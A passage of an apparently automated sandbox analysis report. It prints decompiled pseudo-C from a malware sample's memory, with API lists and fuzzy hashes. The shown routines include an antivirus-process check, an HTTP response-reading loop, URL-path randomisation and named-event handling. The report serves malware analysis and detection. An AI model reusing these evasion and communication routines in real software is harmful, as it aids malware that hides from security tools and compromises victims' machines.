                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 364079b2fa0e593d4041652b2e38e6e6b4c8955bd5c741a02ff0d89e39565218
                                • Instruction ID: 88bd929a1cf784311bb29c79c53c96c6f823e01763500403db5daa10a4f40033
                                • Opcode Fuzzy Hash: 364079b2fa0e593d4041652b2e38e6e6b4c8955bd5c741a02ff0d89e39565218
                                • Instruction Fuzzy Hash: 2E419431E00219BFEB10DE6CDC84BDE776DEF85754F104A6AB905E72A0DBB0BA448B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E048114A8(void* __eax) {
                                				long _v8;
                                				char _v12;
                                				char _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				void* __esi;
                                				void* _t41;
                                				char* _t42;
                                				long _t43;
                                				intOrPtr _t47;
                                				intOrPtr* _t48;
                                				char _t50;
                                				char* _t55;
                                				long _t56;
                                				intOrPtr* _t57;
                                				void* _t60;
                                				void* _t61;
                                				void* _t68;
                                				void* _t72;
                                				void* _t73;
                                				void* _t74;
                                				void* _t78;
                                
                                				_t72 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t41 = _t72;
                                					_pop(_t73);
                                					_t74 = _t41;
                                					_t42 =  &_v12;
                                					_v8 = 0;
                                					_v16 = 0;
                                					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
                                					if(_t42 == 0) {
                                						_t43 = GetLastError();
                                						_v8 = _t43;
                                						if(_t43 == 0x2efe) {
                                							_v8 = 0;
                                							goto L29;
                                						}
                                					} else {
                                						if(_v12 == 0) {
                                							L29:
                                							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                						} else {
                                							_push( &_v24);
                                							_push(1);
                                							_push(0);
                                							if( *0x481a144() != 0) {
                                								_v8 = 8;
                                							} else {
                                								_t47 = E04816837(0x1000);
                                								_v20 = _t47;
                                								if(_t47 == 0) {
                                									_v8 = 8;
                                								} else {
                                									goto L8;
                                									do {
                                										while(1) {
                                											L8:
                                											_t50 = _v12;
                                											if(_t50 >= 0x1000) {
                                												_t50 = 0x1000;
                                											}
                                											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                											if(_t50 == 0) {
                                												break;
                                											}
                                											_t57 = _v24;
                                											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                											_t18 =  &_v12;
                                											 *_t18 = _v12 - _v16;
                                											if( *_t18 != 0) {
                                												continue;
                                											} else {
                                											}
                                											L14:
                                											if(WaitForSingleObject( *0x481a2c4, 0) != 0x102) {
                                												_v8 = 0x102;
                                											} else {
                                												_t55 =  &_v12;
                                												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
                                												if(_t55 != 0) {
                                													goto L19;
                                												} else {
                                													_t56 = GetLastError();
                                													_v8 = _t56;
                                													if(_t56 == 0x2f78 && _v12 == 0) {
                                														_v8 = 0;
                                														goto L19;
                                													}
                                												}
                                											}
                                											L22:
                                											E048150CA(_v20);
                                											if(_v8 == 0) {
                                												_v8 = E048137FC(_v24, _t74);
                                											}
                                											goto L25;
                                										}
                                										_v8 = GetLastError();
                                										goto L14;
                                										L19:
                                									} while (_v12 != 0);
                                									goto L22;
                                								}
                                								L25:
                                								_t48 = _v24;
                                								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                							}
                                						}
                                					}
                                					return _v8;
                                				} else {
                                					_t60 = E048125C7(__eax);
                                					if(_t60 != 0) {
                                						return _t60;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,04817134,00000000,?), ref: 04815B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04817134,00000000,?,?), ref: 04815BBB
                                  • Part of subcall function 048125C7: wcstombs.NTDLL ref: 04812687
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: c3a6e5c9c2204add2a9c98994860a17c846264412fbad9411990ba7f440d6b28
                                • Instruction ID: f48159a4d0585f4a551b29e443a25f4a2ac2151335c8e3208064cf8d3ed5e673
                                • Opcode Fuzzy Hash: c3a6e5c9c2204add2a9c98994860a17c846264412fbad9411990ba7f440d6b28
                                • Instruction Fuzzy Hash: AC414CB5A00209FFDF109FA5C9849AEBBBDFB44344F104A6BE406E3160E774AE80DB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04815C8C
                                • SysAllocString.OLEAUT32(04811E05), ref: 04815CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 04815CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 04815CF1
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 064774a95c5d7d917713e8d68401b10ff6ac47605a557a5ef1d34c5804e5cfde
                                • Instruction ID: 012579a8dd0148bf0be75f1ee166bf2357860d165db83292fe01147349fe3e7d
                                • Opcode Fuzzy Hash: 064774a95c5d7d917713e8d68401b10ff6ac47605a557a5ef1d34c5804e5cfde
                                • Instruction Fuzzy Hash: CD31E7B1900149FF8B05DF98D4848AE7BF9FF88340B10892FE509D7221D775AA45CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E048173C3(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				void* _t25;
                                				void* _t26;
                                				signed int* _t27;
                                				signed short* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0x481a2c8; // 0xbd092303
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0xd05b5869;
                                				_t8 =  *0x481a2d4; // 0x20bd5a8
                                				_t3 = _t8 + 0x481b8a2; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E04812DEA(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x481a2f8, 1, 0, _t30);
                                					E048150CA(_t30);
                                				}
                                				_t12 =  *0x481a2b4; // 0x4000000a
                                				if(_t12 != 6 || _t12 < 2) {
                                					if( *_t32 != 0 && E0481513E() == 0) {
                                						_t28 =  *0x481a120( *_t32, 0x20);
                                						if(_t28 != 0) {
                                							 *_t28 =  *_t28 & 0x00000000;
                                							_t28 =  &(_t28[1]);
                                						}
                                						_t31 = E04816BE1(0, _t28,  *_t32, 0);
                                						if(_t31 == 0) {
                                							if(_t25 == 0) {
                                								goto L21;
                                							}
                                							_t31 = WaitForSingleObject(_t25, 0x4e20);
                                							if(_t31 == 0) {
                                								goto L19;
                                							}
                                						}
                                					}
                                					goto L11;
                                				} else {
                                					L11:
                                					_t27 = _a8;
                                					if(_t27 != 0) {
                                						 *_t27 =  *_t27 | 0x00000001;
                                					}
                                					_t31 = E048151A8(_t32, _t26);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t27 != 0 && _t31 != 0) {
                                						 *_t27 =  *_t27 & 0xfffffffe;
                                					}
                                					L19:
                                					if(_t25 != 0) {
                                						CloseHandle(_t25);
                                					}
                                					L21:
                                					return _t31;
                                				}
                                			}
















                                APIs
                                  • Part of subcall function 04812DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,068D9C98,74ECC740,048155DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,048155DE), ref: 04812E20
                                  • Part of subcall function 04812DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 04812E44
                                  • Part of subcall function 04812DEA: lstrcat.KERNEL32(00000000,00000000), ref: 04812E4C
                                • CreateEventA.KERNEL32(0481A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,048130E1,?,?,?), ref: 04817402
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,048130E1,00000000,?,00000000,?,048130E1,?,?,?,?,?,?,?,0481211B), ref: 04817460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,048130E1,?,?,?), ref: 0481748E
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,048130E1,?,?,?), ref: 048174A6
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 0a28739fadfa22e98e8feb05eef318416b7a80d2ccabde61b52b0cd6952368aa
                                • Instruction ID: abc3cce868972f6922c37de74ae389bb83a54efcbeaff61bd6e79fcd1b649b3c
                                • Opcode Fuzzy Hash: 0a28739fadfa22e98e8feb05eef318416b7a80d2ccabde61b52b0cd6952368aa
                                • Instruction Fuzzy Hash: 2821E172A013126BD7216F689C44B5A7BACEB48B65F010F2BFD02EB261DBA4FC008644
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E04813032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E04816710(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t23 =  &(_t39[1]);
                                						if(_t39[1] != 0) {
                                							E048115B9(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E04814C8C(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x481a2f8, 1, 0,  *0x481a394);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E04814039(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E04811D57(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E04813C84(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E048173C3( &_v32, _t39);
                                					goto L13;
                                				}
                                			}













                                APIs
                                • CreateEventA.KERNEL32(0481A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,0481211B,?,00000001), ref: 04813083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,0481211B,?,00000001,0481560C,00000002,?,?,0481560C), ref: 04813090
                                • Sleep.KERNEL32(00000BB8,?,?,?,?,0481211B,?,00000001,0481560C,00000002,?,?,0481560C), ref: 0481309B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0481211B,?,00000001,0481560C,00000002,?,?,0481560C), ref: 048130A2
                                  • Part of subcall function 04814039: WaitForSingleObject.KERNEL32(00000000,?,?,?,048130C2,?,048130C2,?,?,?,?,?,048130C2,?), ref: 04814113
                                  • Part of subcall function 04814039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,048130C2,?,?,?,?,?,0481211B,?), ref: 0481413B
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 467273019-0
                                • Opcode ID: 77ec3d7a32025e0a55bf7e711baf3890c4832227176f9188e64b6b8a2e0b064e
                                • Instruction ID: ad1b7ce31ae781848d0a56c6e13a9555bf49dee9f7a6716d960b4caa7eeb6426
                                • Opcode Fuzzy Hash: 77ec3d7a32025e0a55bf7e711baf3890c4832227176f9188e64b6b8a2e0b064e
                                • Instruction Fuzzy Hash: 3A219872A00118ABEB10BFE9C8849EE77BDAB04354B054E27EE11E7120D775F944CBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E04814D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E04816837(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}















                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 04814D37
                                • lstrlenW.KERNEL32(?), ref: 04814D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04814D8E
                                • SysFreeString.OLEAUT32(?), ref: 04814DA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 566dea12af63c6e66f16be8b06a0165e18096bbf73bfd7f1d46decb795d41170
                                • Instruction ID: fb09ab3caca676ca0b3d6b921622714917952c60923f85d8c68931872cccb1b3
                                • Opcode Fuzzy Hash: 566dea12af63c6e66f16be8b06a0165e18096bbf73bfd7f1d46decb795d41170
                                • Instruction Fuzzy Hash: 6E212F75900219FFCF10DFA8C88499EBBB8FF49715F10466AE945E7220E770AA45CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E048152E5(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x481a290, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x481a2a8; // 0x0
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x481a2a8 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}


















                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,048162E0,00000000,?,00000000,048170D9,00000000,068D9630), ref: 048152F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04815308
                                • memcpy.NTDLL(00000000,068D9630,-00000008,?,?,?,048162E0,00000000,?,00000000,048170D9,00000000,068D9630), ref: 0481534C
                                • memcpy.NTDLL(00000001,068D9630,00000001,048170D9,00000000,068D9630), ref: 0481536D
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: dca08b37464e63ed743b6077742329903d13d808234640892a4203520c3681c6
                                • Instruction ID: 54cdcec9d2aa8bb1c3ca6cf1d1f5750c33ae2fcfe041a2f3e0a8f1f5095828fb
                                • Opcode Fuzzy Hash: dca08b37464e63ed743b6077742329903d13d808234640892a4203520c3681c6
                                • Instruction Fuzzy Hash: AC1129B2A00114BFD714CF69DC84E9EBBBEEBC1650B050677F404D7160EAB4AE00C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E0481578C(char* __eax) {
                                				char* _t8;
                                				intOrPtr _t12;
                                				char* _t21;
                                				signed int _t23;
                                				char* _t24;
                                				signed int _t26;
                                				void* _t27;
                                
                                				_t21 = __eax;
                                				_push(0x20);
                                				_t23 = 1;
                                				_push(__eax);
                                				while(1) {
                                					_t8 = StrChrA();
                                					if(_t8 == 0) {
                                						break;
                                					}
                                					_t23 = _t23 + 1;
                                					_push(0x20);
                                					_push( &(_t8[1]));
                                				}
                                				_t12 = E04816837(_t23 << 2);
                                				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                				if(_t12 != 0) {
                                					StrTrimA(_t21, 0x48192a4);
                                					_t26 = 0;
                                					do {
                                						_t24 = StrChrA(_t21, 0x20);
                                						if(_t24 != 0) {
                                							 *_t24 = 0;
                                							_t24 =  &(_t24[1]);
                                							StrTrimA(_t24, 0x48192a4);
                                						}
                                						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                						_t26 = _t26 + 1;
                                						_t21 = _t24;
                                					} while (_t24 != 0);
                                					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                				}
                                				return 0;
                                			}











                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,068D962C,?,?,?,04811128,068D962C,?,?,048155D3), ref: 048157A6
                                • StrTrimA.SHLWAPI(?,048192A4,00000002,?,?,?,04811128,068D962C,?,?,048155D3), ref: 048157C5
                                • StrChrA.SHLWAPI(?,00000020,?,?,?,04811128,068D962C,?,?,048155D3,?,?,?,?,?,04816BD8), ref: 048157D0
                                • StrTrimA.SHLWAPI(00000001,048192A4,?,?,?,04811128,068D962C,?,?,048155D3,?,?,?,?,?,04816BD8), ref: 048157E2
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 67074250ceb82e81dfd10429371bacaf1855fad4ae87636f9f1474fb5ac9bae2
                                • Instruction ID: ef97277ed2861fda3e9307afeacccd4af1018df2e0157fe92c2f6752641ded2b
                                • Opcode Fuzzy Hash: 67074250ceb82e81dfd10429371bacaf1855fad4ae87636f9f1474fb5ac9bae2
                                • Instruction Fuzzy Hash: FB01B571605315AFD3208F69DC49E3BBB9CFFC6AA4F110E1AF841D7260DB64D801D6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E0481513E() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x481a2d4; // 0x20bd5a8
                                						_t2 = _t9 + 0x481bdd4; // 0x73617661
                                						_push( &_v264);
                                						if( *0x481a118() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}










                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0481514E
                                • Process32First.KERNEL32(00000000,?), ref: 04815161
                                • Process32Next.KERNEL32(00000000,?), ref: 0481518D
                                • CloseHandle.KERNEL32(00000000), ref: 0481519C
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 1a54680a9ee7d08cdd90b888a6afbac0df9169298b7d61440baf43ce97662f78
                                • Instruction ID: e6c9b585befb7c3bdccfae28090171527018548afca0c2c1fe9c688c43e7b40a
                                • Opcode Fuzzy Hash: 1a54680a9ee7d08cdd90b888a6afbac0df9169298b7d61440baf43ce97662f78
                                • Instruction Fuzzy Hash: 1AF0BBB170112476E722EA76DC48DDB77ACDBC4718F000F63ED45D2020F674ED4686A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E048110DD(void** __esi) {
                                				char* _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				intOrPtr _t11;
                                				void* _t12;
                                				void** _t14;
                                
                                				_t14 = __esi;
                                				_t4 =  *0x481a37c; // 0x68d9630
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x481a37c; // 0x68d9630
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t14;
                                				if(_t8 != 0 && _t8 != 0x481a030) {
                                					HeapFree( *0x481a290, 0, _t8);
                                				}
                                				_t14[1] = E0481578C(_v0, _t14);
                                				_t11 =  *0x481a37c; // 0x68d9630
                                				_t12 = _t11 + 0x40;
                                				__imp__(_t12);
                                				return _t12;
                                			}











                                APIs
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 048110E6
                                • Sleep.KERNEL32(0000000A,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 048110F0
                                • HeapFree.KERNEL32(00000000,00000000,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 04811118
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 04811134
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: d042f9c69c0db9608b1c76817865dde404d476ea8605d76afc7533dff84ba399
                                • Instruction ID: 56fb5af69fe853b81d6851efa478109a138444d734d6bbeede281b47858925e5
                                • Opcode Fuzzy Hash: d042f9c69c0db9608b1c76817865dde404d476ea8605d76afc7533dff84ba399
                                • Instruction Fuzzy Hash: CAF034B0702250DBE724AFB8E849B1AB7ACEB08744B048D03F645D7271C628EC00CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04815076() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x481a2c4; // 0x34c
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x481a308; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x481a2c4; // 0x34c
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x481a290; // 0x64e0000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}









                                APIs
                                • SetEvent.KERNEL32(0000034C,00000001,048156C9), ref: 04815081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04815090
                                • CloseHandle.KERNEL32(0000034C), ref: 048150B1
                                • HeapDestroy.KERNEL32(064E0000), ref: 048150C1
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 32c22b18ac606fbd51373097314ebd35e4e2cba257bc3bd2a89818bf8e882801
